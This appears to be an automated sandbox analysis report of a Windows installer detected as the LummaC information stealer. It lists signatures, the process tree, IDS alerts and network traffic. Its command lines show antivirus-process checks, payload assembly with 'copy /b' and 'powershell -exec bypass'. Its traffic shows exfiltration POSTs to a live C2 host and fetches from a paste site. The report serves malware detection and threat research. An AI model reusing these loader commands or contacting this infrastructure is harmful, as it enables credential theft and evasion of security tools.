Windows Analysis Report
!Set-up..exe

Overview

General Information

Sample name: !Set-up..exe
Analysis ID: 1581739
MD5: 27968eebcb115c6ecb62199a98ce9ee6
SHA1: 7892f28bf31caf505e792268e138210588aa4d8d
SHA256: a124b81ef52d77f88c5b00f0a999482d429602f3cf5a413b3860c2b45909272d
Tags: exe user-aachum

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Drops PE files with a suspicious file extension
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • !Set-up..exe (PID: 6112 cmdline: "C:\Users\user\Desktop\!Set-up..exe" MD5: 27968EEBCB115C6ECB62199A98CE9EE6)
    • cmd.exe (PID: 5788 cmdline: "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5744 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5436 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6564 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6584 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6556 cmdline: cmd /c md 71992 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 6568 cmdline: extrac32 /Y /E Ec MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 3356 cmdline: findstr /V "Ratio" Returning MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6984 cmdline: cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 1788 cmdline: cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Banned.com (PID: 6460 cmdline: Banned.com V MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 6516 cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 3224 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | -
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | -

      System Summary

      Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 6460, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", ProcessId: 6516, ProcessName: powershell.exe
      Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 6460, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", ProcessId: 6516, ProcessName: powershell.exe
      Source: Process started | Author: frack113 | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 6460, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", ProcessId: 6516, ProcessName: powershell.exe
      Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Banned.com V, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com, ParentProcessId: 6460, ParentProcessName: Banned.com, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1", ProcessId: 6516, ProcessName: powershell.exe

      HIPS / PFW / Operating System Protection Evasion

      Source: Process started | Author: Joe Security | Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5788, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6584, ProcessName: findstr.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-28T21:35:56.856378+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49784 | 172.67.213.115 | 443 | TCP
      2024-12-28T21:35:59.109107+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49790 | 172.67.213.115 | 443 | TCP
      2024-12-28T21:36:01.379888+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49797 | 172.67.213.115 | 443 | TCP
      2024-12-28T21:36:03.672548+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49803 | 172.67.213.115 | 443 | TCP
      2024-12-28T21:36:05.830553+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49809 | 172.67.213.115 | 443 | TCP
      2024-12-28T21:36:08.201372+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49815 | 172.67.213.115 | 443 | TCP
      2024-12-28T21:36:10.507535+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49821 | 172.67.213.115 | 443 | TCP
      2024-12-28T21:36:13.624453+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49831 | 172.67.213.115 | 443 | TCP
      2024-12-28T21:36:15.857196+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49836 | 172.67.75.40 | 443 | TCP
      2024-12-28T21:35:57.889164+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49784 | 172.67.213.115 | 443 | TCP
      2024-12-28T21:35:59.860017+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49790 | 172.67.213.115 | 443 | TCP
      2024-12-28T21:36:14.406950+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49831 | 172.67.213.115 | 443 | TCP
      2024-12-28T21:35:57.889164+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49784 | 172.67.213.115 | 443 | TCP
      2024-12-28T21:35:59.860017+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49790 | 172.67.213.115 | 443 | TCP
      2024-12-28T21:36:04.494462+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49803 | 172.67.213.115 | 443 | TCP

      AV Detection

      Source: !Set-up..exe | Virustotal: Detection: 15%
      Source: !Set-up..exe | ReversingLabs: Detection: 16%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.8% probability
      Source: !Set-up..exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49784 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49790 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49797 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49803 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49809 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49815 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49821 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49831 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.5:49836 version: TLS 1.2
      Source: !Set-up..exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\!Set-up..exe | Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\!Set-up..exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\

      Networking

      Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49790 -> 172.67.213.115:443
      Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49790 -> 172.67.213.115:443
      Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49784 -> 172.67.213.115:443
      Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49784 -> 172.67.213.115:443
      Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49803 -> 172.67.213.115:443
      Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49831 -> 172.67.213.115:443
      Source: unknown | DNS query: name: rentry.co
      Source: Joe Sandbox View | IP Address: 172.67.213.115 172.67.213.115
      Source: Joe Sandbox View | IP Address: 172.67.75.40 172.67.75.40
      Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49790 -> 172.67.213.115:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49797 -> 172.67.213.115:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49784 -> 172.67.213.115:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49809 -> 172.67.213.115:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49815 -> 172.67.213.115:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49803 -> 172.67.213.115:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49831 -> 172.67.213.115:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49821 -> 172.67.213.115:443
      Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49836 -> 172.67.75.40:443
      Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: fallyjustif.click
      Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 49 | Host: fallyjustif.click
      Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=LMN9VRPDP5JIZR2K4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12831 | Host: fallyjustif.click
      Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=NXVOOFBV7DO | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15037 | Host: fallyjustif.click
      Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=GO21UPWVTOIT6TU1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20557 | Host: fallyjustif.click
      Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=7R2O5KRSM9MP5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1207 | Host: fallyjustif.click
      Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=RI5EHQNV84U | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 587822 | Host: fallyjustif.click
      Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 84 | Host: fallyjustif.click
      Source: global traffic | HTTP traffic detected: GET /feouewe5/raw HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: rentry.co
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic | HTTP traffic detected: GET /feouewe5/raw HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: rentry.co
      Source: global traffic | DNS traffic detected: DNS query: xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi
      Source: global traffic | DNS traffic detected: DNS query: fallyjustif.click
      Source: global traffic | DNS traffic detected: DNS query: rentry.co
      Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: fallyjustif.click
      Source: !Set-up..exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: !Set-up..exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
      Source: !Set-up..exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: !Set-up..exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: !Set-up..exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: Writing.9.dr, Banned.com.2.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: !Set-up..exe | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
      Source: Banned.com.2.dr, Ford.9.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: !Set-up..exe | String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
      Source: !Set-up..exe, Writing.9.dr, Banned.com.2.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Banned.com.2.dr, Ford.9.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Writing.9.dr, Banned.com.2.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: !Set-up..exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: !Set-up..exe | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: !Set-up..exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: !Set-up..exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: !Set-up..exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: !Set-up..exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: !Set-up..exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: !Set-up..exe | String found in binary or memory: http://ocsp.digicert.com0
      Source: !Set-up..exe | String found in binary or memory: http://ocsp.digicert.com0A
      Source: !Set-up..exe | String found in binary or memory: http://ocsp.digicert.com0C
      Source: !Set-up..exe | String found in binary or memory: http://ocsp.digicert.com0I
      Source: !Set-up..exe | String found in binary or memory: http://ocsp.digicert.com0X
      Source: Writing.9.dr, Banned.com.2.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: !Set-up..exe | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
      Source: !Set-up..exe | String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
      Source: !Set-up..exe | String found in binary or memory: http://ocsp.globalsign.com/rootr30;
      Source: Banned.com.2.dr, Ford.9.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Writing.9.dr, Banned.com.2.dr, Ford.9.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Writing.9.dr, Banned.com.2.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: powershell.exe, 00000011.00000002.2787345765.0000000004F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: !Set-up..exe | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
      Source: Banned.com.2.dr, Ford.9.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: !Set-up..exe | String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
      Source: Writing.9.dr, Banned.com.2.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: !Set-up..exe | String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
      Source: Banned.com, 0000000D.00000000.2078706005.0000000000785000.00000002.00000001.01000000.00000007.sdmp, Banned.com.2.dr, Ford.9.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: !Set-up..exe | String found in binary or memory: http://www.digicert.com/CPS0
      Source: !Set-up..exe | String found in binary or memory: http://www.teamviewer.com
      Source: powershell.exe, 00000011.00000002.2787345765.0000000004F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2787345765.00000000050B9000.00000004.00000800.00020000.00000000.sdmp, Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.dr | String found in binary or memory: https://rentry.co/
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co/hZ#l
      Source: Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.dr | String found in binary or memory: https://rentry.co/static/icons/512.png
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co/static/icons/512.pnghZ#l
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2787345765.00000000050B9000.00000004.00000800.00020000.00000000.sdmp, Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.dr | String found in binary or memory: https://rentry.co/what
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co/whathZ#l
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co/whathZ#l(M/
      Source: Writing.9.dr, Banned.com.2.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Banned.com.2.dr, Ford.9.dr | String found in binary or memory: https://www.globalsign.com/repository/0
      Source: powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2787345765.00000000050B9000.00000004.00000800.00020000.00000000.sdmp, Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.dr | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknown | Network traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknown | Network traffic detected: HTTP traffic on port 49836 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknown | Network traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49836
      Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49784 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49790 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49797 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49803 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49809 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49815 version: TLS 1.2
